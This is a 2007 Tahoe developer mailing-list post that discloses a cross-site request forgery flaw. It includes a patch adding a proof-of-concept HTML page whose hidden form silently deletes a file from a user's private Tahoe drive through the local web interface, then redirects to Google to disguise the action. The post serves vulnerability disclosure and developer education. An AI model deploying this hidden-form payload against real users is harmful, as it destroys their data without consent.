[tahoe-dev] Example XSRF attack.
Nathan
nejucomo at gmail.com
Sun Aug 19 17:38:40 PDT 2007
Hi folks,
Since I've only recently learned about XSRF attacks, I have little
practical experience with them. I suspected the current webapi was
vulnerable to such attacks, but wanted a proof-of-concept. Here it
is.
One misconception I hope this points out is that Javascript security
constraints are certainly not adequate to rely on.
This example shows how subtle such attacks can be. In the wild I
would easily miss having launched this attack, and I bet most
security-conscious surfers would also. I'm not too familiar with HTML
and Javascript, but this attack took me about 20 minutes to write
(including Googling for examples).
Regards,
Nathan
ps: Darcs patch attached, and human readable diff follows:
Sun Aug 19 18:21:38 MDT 2007 nejucomo at gmail.com
* This example XSRF attack deletes private data.
It's an html page which describes its own operation.
diff -rN -u old-tahoe/docs/example-xsrf-attack.html
new-tahoe/docs/example-xsrf-attack.html
--- old-tahoe/docs/example-xsrf-attack.html 1969-12-31 17:00:00.000000000 -0700
+++ new-tahoe/docs/example-xsrf-attack.html 2007-08-19 18:29:40.000000000 -0600
@@ -0,0 +1,81 @@
+<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
+<html>
+ <head>
+ <title>Example XSRF attach against Tahoe v0.5</title>
+ </head>
+
+ <body>
+ <h1>Example XSRF attach against Tahoe v0.5</h1>
+
+ <p>
+ <b>NOTE:</b> This page contains an attack triggered by a link
+ clearly labeled "ATTACK LINK". Other links should be benign.
+ </p>
+
+ <p>
+ This serves as an example XSRF attack against Tahoe v0.5. If the
+ requisite conditions are met, then clicking on an innocuous looking
+ link below will delete your private Tahoe contents.
+ </p>
+
+ <p>
+ This example illustrates how stealthy such attacks can be.
+ If successful, the user may easily believe they followed a simple
+ link to Google, when actually they deleted private Tahoe contents.
+ </p>
+
+ <h2>Requisite Conditions</h2>
+ <ol>
+ <li>
+ Your private vdrive has a file named "xsrf/targetdata".
+ (If this example succeeds this path will be deleted!)
+ </li>
+ <li>
+ Your Tahoe node is running with a web interface listening to
+ <a href="http://localhost:8080/">http://localhost:8080/</a>.
+ </li>
+ <li>
+ Your browser has Javascript enabled.
+ </li>
+ </ol>
+
+ <p>
+ Notice, this attack could come from any source (such as another
+ website, or html-enabled email) so long as the browser has Tahoe
+ access.
+ </p>
+
+ <h2>Attack Trigger</h2>
+
+ <p>
+ This paragraph contains a hidden html payload for the attack.
+ <div style="display:none;">
+ <form
+ method="post"
+ name="htmlAttackPayload"
+ action="http://localhost:8080/vdrive/private/xsrf">
+
+ <input type="hidden" name="t" value="delete">
+ <input type="hidden" name="name" value="targetdata">
+ <input type="hidden" name="when_done" value="http://www.google.com">
+ </form>
+ </div>
+ </p>
+
+ <p>
+ If the attack is successful, you should be redirected to www.google.com.
+ </p>
+
+ <p>
+ Click this <a
+ href="javascript:document.htmlAttackPayload.submit();">ATTACK
+ LINK</a> to launch the attack.
+ </p>
+
+ <hr>
+<!-- Created: Sun Aug 19 17:41:32 MDT 2007 -->
+<!-- hhmts start -->
+Last modified: Sun Aug 19 18:21:36 MDT 2007
+<!-- hhmts end -->
+ </body>
+</html>
-------------- next part --------------
A non-text attachment was scrubbed...
Name: xsrf-example.patch
Type: text/x-patch
Size: 38544 bytes
Desc: not available
Url : http://allmydata.org/pipermail/tahoe-dev/attachments/20070819/54aa30d1/attachment-0001.bin
More information about the tahoe-dev
mailing list